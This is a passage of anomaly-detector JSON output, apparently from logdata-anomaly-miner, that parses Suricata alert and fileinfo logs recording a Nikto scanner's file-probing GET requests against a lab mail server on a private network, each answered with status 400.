"ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.333976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46932 -> 192.168.10.154:80", "/parser/model/time": 1583349514.333976, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46932, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.333976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46932 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.old", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.334225+0000\",\"flow_id\":1835810740114780,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.334225, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1835810740114780,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.old\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.old\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.old", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.old", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46932, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1835810740114780,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1835810740114780, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.334225+0000\",\"flow_id\":1835810740114780,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.336929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46934 -> 192.168.10.154:80", "/parser/model/time": 1583349514.336929, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46934, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.336929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46934 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.bas:ShowVolume", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.337148+0000\",\"flow_id\":135802554818065,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.337148, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":135802554818065,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.bas:ShowVolume\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.bas:ShowVolume\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.bas:ShowVolume", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.bas:ShowVolume", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46934, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":135802554818065,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 135802554818065, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.337148+0000\",\"flow_id\":135802554818065,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.341111 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46936 -> 192.168.10.154:80", "/parser/model/time": 1583349514.341111, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46936, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.341111 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46936 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sqlite", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.342355+0000\",\"flow_id\":630883435031917,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.342355, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":630883435031917,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sqlite\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sqlite\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sqlite", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sqlite", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46936, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", 